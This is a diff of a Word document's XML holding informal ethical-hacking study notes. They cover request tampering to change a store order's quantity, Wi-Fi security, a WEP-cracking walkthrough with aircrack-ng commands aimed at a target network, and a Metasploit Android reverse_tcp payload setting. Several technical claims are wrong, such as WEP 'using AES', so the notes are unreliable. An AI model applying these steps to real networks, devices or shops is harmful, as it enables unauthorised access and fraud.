+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>tampermonkey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> tamper with the requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tamperdata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11035,14 +13138,27 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>WIFI(801.11)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">We have different wifi(s) based on the </w:t>
+        <w:t>WIFI(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>801.11)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We have different </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(s) based on the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11116,7 +13232,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Any wifi device can act as either an </w:t>
+        <w:t xml:space="preserve">Any </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> device can act as either an </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11130,7 +13254,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Frequency is inversely proportional to distance. This means if your is running on higher frequency the distance it travels is very less. So if we want the signal to penetrate to a larger distance use lower frequencies.</w:t>
+        <w:t xml:space="preserve">Frequency is inversely proportional to distance. This means if </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>your is</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> running on higher frequency the distance it travels is very less. So if we want the signal to penetrate to a larger distance use lower frequencies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11149,7 +13281,31 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>When there are a lot of wifi(s) in a single room there is a possibility that they may overlap each other. Now a device accepting the signal gets confused as to which access point it needs to access. To eliminate this we wifi with different channels. This is similar to the channels in your T.V, where we use channels to differentiate the network. In this similar fashioned way we use wifi on different channels when there is a possibility of overlapping to differentiate between them.</w:t>
+        <w:t xml:space="preserve">When there are a lot of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(s) in a single room there is a possibility that they may overlap each other. Now a device accepting the signal gets confused as to which access point it needs to access. To eliminate this we </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with different channels. This is similar to the channels in your T.V, where we use channels to differentiate the network. In this similar fashioned way we use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on different channels when there is a possibility of overlapping to differentiate between them.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11175,7 +13331,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId129" cstate="print">
+                    <a:blip r:embed="rId128" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11228,7 +13384,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId130">
+                    <a:blip r:embed="rId129">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11267,12 +13423,20 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Wifi Security:</w:t>
+        <w:t>Wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Security:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11287,7 +13451,23 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>MAC binding /ACL : This is similar to mac filtering in present scenario, i.e only bind mac address will work on router but there is a possibility of mac spoofing.</w:t>
+        <w:t>MAC binding /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ACL :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> This is similar to mac filtering in present scenario, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i.e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> only bind mac address will work on router but there is a possibility of mac spoofing.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11301,8 +13481,13 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t>WEP : Wired Equivalent Privileges. Uses AES algorithm.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>WEP :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Wired Equivalent Privileges. Uses AES algorithm.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11317,7 +13502,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>WPA and WPA2: Wifi Protection Access. WPA2 is just the second generation of WPA. Uses hashing algorithms for passwords.</w:t>
+        <w:t xml:space="preserve">WPA and WPA2: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Protection Access. WPA2 is just the second generation of WPA. Uses hashing algorithms for passwords.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11332,22 +13525,64 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>RADIUS: Remote Authentication Dial In User Service. In corporate companies sharing wifi passwords can also lead to data loss or lead to attacks so what they do is use RADIUS protocols. When ever a user asking for a connection to the wifi the router will simply ask for username and password. The router on accepting the credential it will gets it authenticated from the Domain server of the company. The router contains the address of the domain name server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>wifi hack</w:t>
+        <w:t xml:space="preserve">RADIUS: Remote Authentication Dial </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>In</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> User Service. In corporate companies sharing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> passwords can also lead to data loss or lead to attacks so what they do is use RADIUS protocols. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>When ever</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a user asking for a connection to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the router will simply ask for username and password. The router on accepting the credential it will gets it authenticated from the Domain server of the company. The router contains the address of the domain name server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hack</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
@@ -11360,74 +13595,208 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>To perform the hack we need to have a network wifi card that can be put into monitor mode.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Airmon-ng start wlan0.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Next when the wifi card is in monitor mode capture the packet data using:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Airodump-ng –w wep –c &lt;channel&gt; - -bssid &lt;mac address&gt;  &lt;monitormode instance&gt;.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Here both the channel and the mac address are of the target wifi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Now to crack the password use aircrack.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Aircrack-ng &lt;filename.cap&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>When you store packets the IV{ Initialization Vector}. These contain the passwords encrypted but can be cracked. The WEP cracking is simple if we have traffic but cracking a WAP-PSK is a bit difficult since we need to at least analyse over 40,000 packets.</w:t>
+        <w:t xml:space="preserve">To perform the hack we need to have a network </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> card that can be put into monitor mode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Airmon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>-ng start wlan0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Next when the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> card is in monitor mode capture the packet data using:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Airodump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ng –w </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>wep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –c &lt;channel&gt; - -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>bssid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;mac address</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt;  &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>monitormode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> instance&gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Here both the channel and the mac address are of the target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now to crack the password use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aircrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Aircrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>-ng &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>filename.cap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">When you store packets the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>IV{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Initialization Vector}. These contain the passwords encrypted but can be cracked. The WEP cracking is simple if we have traffic but cracking a WAP-PSK is a bit difficult since we need to at least analyse over 40,000 packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11436,27 +13805,1394 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Wardriving: cracking w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ifi while moving fast .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Warchalking: Mapping of wifi networks with the help of symbols.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wardriving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: cracking </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> while moving </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>fast .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Warchalking</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">: Mapping of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wifi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> networks with the help of symbols.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Mobile hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Similar to other Trojan attacks this is also done with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and few assumptions. We assume that the device android and it uses an older updated version.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Procedure: almost similar to the other </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> attacks. The only thing that changes is the type of payload.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>set</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payload android/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5731510" cy="4298633"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:docPr id="18" name="Picture 18" descr="C:\Users\Harsha_Hacker\Downloads\WhatsApp Image 2018-05-17 at 11.25.49 PM.jpeg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5" descr="C:\Users\Harsha_Hacker\Downloads\WhatsApp Image 2018-05-17 at 11.25.49 PM.jpeg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId130">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="4298633"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">NOTE: security is needed as much as the value of the data or anything </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>is .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ex: you don’t put a high security for a normal ruby but you might for a ruby that had a historical significance. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cryptography</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Crypt-secret and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>graphy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-write. In a way we can say converting a secret data to a different </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>form ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and back using cipher.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>There are 3 different kinds of cryptography:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Symmetric- </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This is one of the starting kinds of cryptography. The cipher key used for both encryption and decryption is the same. The main disadvantage of this kind is how </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are you</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> going to send the key to the receiver without anyone knowing it. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Asymmetric- </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This has many algorithms: RSA, DSA, elliptic curve and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>diffie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>hellman</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">The best part of asymmetric cryptography is we can eliminate all the disadvantages in symmetric cryptography. There is no need to transfer of key safely nor do we need to worry even if the key is hands of an attacker. In this we take a different approach to encrypt and decrypt data. The process involves generating a private and public pair. The public can be sent to your receivers or can even be broadcasted. The data that needs to be sent will be encrypted with a public key and sent to the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>host(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>sender of the public key). Now the data that is encrypted with a public can only be decrypted with the help of its counter private key. Now there is a possibility that a person can fake the ID and send a public key for sharing. How can we say that he is the legitimate person to whom our data can be sent? Here comes the part of certifying the key. There will be a trusted third part that gathers some information from the sender of the key and authenticates and certifies he is the legitimate person to whom you want to send data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>one</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> way hashing-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> In this method we don’t have any keys for sharing nor any encryption or decryptions . All we have is hashing the data. The data that needs to be secured will be hashed. There no way back after hashing the data. All we have to do is try different </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>possibilities ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> hash them and compare them with the hash they have.</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
